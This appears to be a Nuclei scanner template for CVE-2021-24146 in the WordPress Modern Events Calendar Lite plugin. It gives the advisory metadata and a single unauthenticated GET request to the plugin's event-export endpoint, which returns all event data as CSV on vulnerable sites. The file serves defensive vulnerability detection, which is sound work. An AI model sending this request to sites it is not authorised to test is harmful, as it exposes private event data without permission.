id: CVE-2021-24146 info: name: WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure author: random_robbie severity: high description: WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format. reference: - https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc - http://packetstormsecurity.com/files/163345/WordPress-Modern-Events-Calendar-5.16.2-Information-Disclosure.html - https://nvd.nist.gov/vuln/detail/CVE-2021-24146 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 cve-id: CVE-2021-24146 cwe-id: CWE-284 tags: cve2021,wpscan,packetstorm,wordpress,wp-plugin,cve requests: - method: GET path: - "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv" matchers-condition: and matchers: - type: word words: - "mec-events" - "text/csv" condition: and part: header - type: status status: - 200 # Enhanced by mp on 2022/06/22